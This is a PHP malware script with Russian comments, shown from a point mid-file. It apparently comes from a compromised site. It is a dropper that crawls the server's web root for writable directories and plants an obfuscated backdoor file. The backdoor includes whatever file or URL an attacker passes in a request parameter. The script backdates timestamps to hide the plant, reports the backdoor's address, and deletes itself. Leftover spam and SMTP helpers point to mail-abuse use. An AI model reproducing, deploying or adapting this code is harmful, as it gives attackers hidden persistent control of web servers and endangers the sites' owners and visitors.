'; if($spam == 1) echo('__spam__'); if($check == 1) echo('__check__'); echo ''; } // load function co(){ if(rand(1,10) > 5) return '/*'.substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',1)),0,rand(3,15)).'*/';} function pe(){ return substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz_',1)),0,rand(1,9));} $p_1 = pe();$p_2 = pe();$p_3 = pe();$p_4 = pe(); $body = ' 3)?'require':'include'; $body .= (rand(0,9) > 3)?'_once':''; $body .= '($'.$p_3.'["uri"]);'.co().'}else '.co().'die("error");?>'; $homedir=@$_SERVER['DOCUMENT_ROOT']; // Определение хоста if(isset($_SERVER['HTTPS'])) $scheme = $_SERVER['HTTPS']; else $scheme = ''; if($scheme && $scheme != '' && $scheme != 'off') $host = 'https://'.$_SERVER['HTTP_HOST']; else $host = 'http://'.$_SERVER['HTTP_HOST']; $homedir = @$_SERVER['DOCUMENT_ROOT']; if($handle = opendir($homedir)) // Попытка раз { while (false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; if(filetype($homedir.DIRECTORY_SEPARATOR.$file) == "dir") $root_dirs[$file]=$homedir.DIRECTORY_SEPARATOR.$file; } shuffle($root_dirs); foreach($root_dirs as $root_name => $root_dir) $result[$root_name] = scan($root_dir); if(count($result) > 0) foreach($result as $info) { if(!isset($info['dir']) || count(@$info['dir']) == 0) continue; if(!isset($info['file']) || count(@$info['file']) == 0) continue; $info['dir'] = array_unique($info['dir']); shuffle($info['dir']); $info['file'] = array_unique($info['file']); shuffle($info['file']); foreach($info['dir'] as $random_dir) { foreach($info['file'] as $random_file) { if(count($info['dir']) == 1 && $try_random == '1') { $suffix = array('_', '.old', '_old', 'old', 'bak', '.bak', '_bak', '1', '2', '3', '_1', '_2', '_3', '.1', '.2', '.3'); shuffle($suffix); $replace = $suffix[0].'.php'; $random_file = preg_replace('/\.php$/i', $replace, $random_file); } $random_path = $random_dir.DIRECTORY_SEPARATOR.'t_s_'.$random_file; if(!is_file($random_dir.DIRECTORY_SEPARATOR.$random_file)) { if(is_writable($random_dir)) { $dir_time = filemtime($random_dir); if($handle = opendir($random_dir)) { $old_time = microtime(1); while (false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $filemt = filemtime($random_dir.DIRECTORY_SEPARATOR.$file); if($filemt < $old_time) $old_time = $filemt; } $old_time = ($dir_time < $old_time) ? $dir_time : $old_time; $test_str = ''; if(file_put_contents($random_path, $test_str)) { $url = $host.str_replace('\\','/',str_replace($homedir,'',$random_path)); if($content = get($url)) { if(preg_match('/'.md5(23).'/', $content)) { unlink($random_path); $random_path = str_replace('t_s_', '', $random_path); if(file_put_contents($random_path, $body)) { chmod($random_path, 0755); touch($random_path, $old_time); touch($random_dir, $dir_time); endik(str_replace('/t_s_', '/', $url)); } else endik('re_error_write'); } } if(file_exists($random_path)) { unlink($random_path); touch($random_dir, $dir_time); } } } } break(1); } } } } } if(is_writable(dirname($_SERVER['SCRIPT_FILENAME']))) // Попытка два { $old_time = (filemtime("./") < filemtime("../")) ? filemtime("./") : filemtime("../"); $file = dirname($_SERVER['SCRIPT_FILENAME']).DIRECTORY_SEPARATOR.'input.php'; if(file_put_contents($file, $body)) { touch($file, $old_time); $url_path = str_replace('//', '/', dirname($_SERVER['PHP_SELF']).'/input.php'); endik($host.$url_path); } else endik('re_error_write'); } else endik('re_error_right'); // Функции function scan($homedir, $count=0, $files=array()) { $scan_max = 2; $subdir = array(); if($count > $scan_max) return $files; if($handle = opendir($homedir)) { $files['dir'][] = $homedir; while(false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $fullPath = $homedir.DIRECTORY_SEPARATOR.$file; if(filetype($fullPath) == "dir") { $files['dir'][] = $fullPath; $subdir[] = $fullPath; } elseif(!preg_match('#(index\.php|admin\.php)#', $file) and preg_match('/\.php$/i', $file)) $files['file'][] = $file; } ++$count; if(count($subdir) > 0) foreach($subdir as $dir) $files = scan($dir, $count, $files); } return $files; } function get($url) { if(is_callable("curl_exec")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $content = curl_exec($ch); curl_close($ch); return $content; } elseif(is_callable("file_get_contents") && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) { return file_get_contents($url, false, stream_context_create(array( "ssl" => array("verify_host" => false, "verify_peer" => false, "verify_peer_name" => false, "allow_self_signed" => true ), "http" => array( "header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0" ) ))); } elseif(is_callable("fsockopen")) { if($fp = fsockopen(parse_url($url, PHP_URL_HOST), 80, $e, $e, 15)) { $out ="GET ".parse_url($url, PHP_URL_PATH)." HTTP/1.1\r\n"; $out.="Host: ".parse_url($url, PHP_URL_HOST)."\r\n"; $out.="User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"; $out.="\r\n"; fputs($fp, $out); $content = ''; while(!feof($fp)) { $content .= fgets($fp, 1024); } fclose($fp); return $content; } else return false; } else return false; } function get_data($socket) { $smtp_msg = ''; while ($line = fgets($socket, 515)) { $smtp_msg .= $line; if(substr($line, 3, 1) == " ") break; } return ($smtp_msg); } function endik($msg) { @unlink(__FILE__); $result = ''.$msg.''; die($result); } ?>